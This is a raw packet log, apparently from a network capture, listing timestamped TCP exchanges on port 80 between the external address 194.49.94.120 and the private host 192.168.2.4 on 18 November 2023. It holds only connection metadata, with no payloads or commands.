Nov 18, 2023 10:02:37.456970930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456973076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456986904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456999063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457001925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457019091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457025051 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457035065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457051992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457061052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457068920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457083941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457098961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457101107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457117081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457120895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457134008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457150936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457161903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457166910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457182884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457195044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457200050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457216024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457217932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457233906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457257986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457258940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457276106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457288980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.457292080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.457335949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.458436012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458452940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458467960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458484888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458492994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.458501101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458517075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458518028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.458534002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458551884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.458555937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.458600044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459353924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459371090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459387064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459403992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459419966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459422112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459436893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459443092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459465981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459608078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459625006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459640980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459657907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459657907 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459675074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459688902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459690094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459706068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459722042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459722996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459738970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459754944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459772110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459773064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459789038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459800005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459806919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459820032 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459821939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459839106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459853888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459855080 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459872961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459880114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459891081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459907055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459923029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459939957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459943056 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459955931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459968090 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.459971905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459989071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.459994078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460005999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460021019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460025072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460036993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460056067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460069895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460072994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460088968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460093021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460105896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460122108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460135937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460138083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460155964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460170984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460177898 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460186958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460203886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460220098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460232973 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460237980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460253954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460264921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460270882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460284948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460287094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460303068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460319042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460334063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460336924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460350990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460369110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460370064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460387945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460393906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460405111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460414886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460422039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460439920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460455894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460465908 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460472107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460489035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460500002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460505009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460520983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460531950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460537910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460553885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460555077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460571051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460586071 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460587978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460604906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460622072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460624933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460639000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460648060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460654974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460671902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460689068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460692883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460705042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460716009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460721970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460738897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460752010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460755110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460771084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460788012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460800886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460803986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460819960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460836887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460845947 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460854053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460870028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460877895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460885048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460887909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460902929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460918903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460927010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460942984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460961103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460968018 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460978031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.460994959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.460999966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461018085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461026907 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461035967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461052895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461061954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461069107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461086035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461102962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461108923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461118937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461137056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461143970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461153984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461164951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461169004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461185932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461201906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461205959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461221933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461237907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461239100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461261988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461278915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461291075 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461296082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461314917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461323977 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461333036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461344957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461349964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461366892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461383104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461383104 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461399078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461416006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461422920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461436033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461442947 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461452007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461468935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461478949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461486101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461503983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461513042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461520910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461538076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461555958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461558104 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461574078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461585999 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461590052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461606026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461618900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461622953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461639881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461656094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461663961 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461672068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461688042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461689949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461705923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461721897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461724043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461740017 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461740971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461756945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461774111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461791039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461796999 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461807966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461818933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461824894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461841106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461853027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461859941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461875916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461893082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461899042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461910009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461927891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461934090 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461945057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461957932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.461961985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461978912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461996078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.461996078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462013960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462028980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462032080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462049007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462065935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462078094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462084055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462102890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462111950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462120056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462131977 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462136984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462155104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462168932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462169886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462188005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462201118 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462204933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462223053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462240934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462249041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462255955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462272882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462285042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462290049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462304115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462306023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462322950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462340117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462341070 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462357044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462373018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462374926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462389946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462399006 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462407112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462423086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462438107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462449074 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462455034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462471962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462481976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462487936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462503910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462505102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462522030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462538004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462538004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462553978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462569952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462573051 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462587118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462598085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462605000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462620974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462637901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462639093 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462655067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462661028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462671995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462688923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462697029 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462704897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462721109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462737083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462743044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462755919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462764978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462773085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462790966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462806940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462806940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462822914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462841988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.462846041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.462857962 CET	80	49744	194.49.94.120	192.168.2.4
